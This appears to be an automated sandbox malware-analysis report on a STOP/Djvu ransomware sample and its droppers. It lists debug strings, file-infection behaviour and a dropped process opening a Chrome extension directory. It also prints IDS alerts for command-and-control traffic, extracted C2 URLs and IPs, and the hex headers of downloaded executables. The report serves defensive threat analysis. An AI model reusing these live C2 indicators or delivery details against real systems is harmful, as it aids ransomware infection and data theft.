Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\w source: UXNob1Dp32.exe, 00000005.00000003.2184193882.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2177560413.0000000003160000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175249606.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182377218.0000000003161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.000000000339C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142579467.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UXNob1Dp32.exe, 00000005.00000003.1736142070.00000000097F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorW1,Q source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: UXNob1Dp32.exe, 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2141965591.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142726213.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140931110.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\ source: UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120473217.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ion Da source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\~18DQ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408904996229952.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\f source: UXNob1Dp32.exe, 00000005.00000003.2120429793.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119548064.000000000315D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*v source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\% source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\AC\3 source: UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\lpane5 source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k3a source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\; source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Ro source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ows\ source: UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Users source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html			Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Temp\chrome.exe			Jump to behavior

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49735 -> 189.245.19.217:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49733 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49733 -> 186.13.17.220:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.245.19.217:80 -> 192.168.2.4:49734
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 189.245.19.217:80 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49736 -> 189.245.19.217:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49736 -> 189.245.19.217:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor	URLs: http://cajgtus.com/test2/get.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 03:07:01 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 03:07:24 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 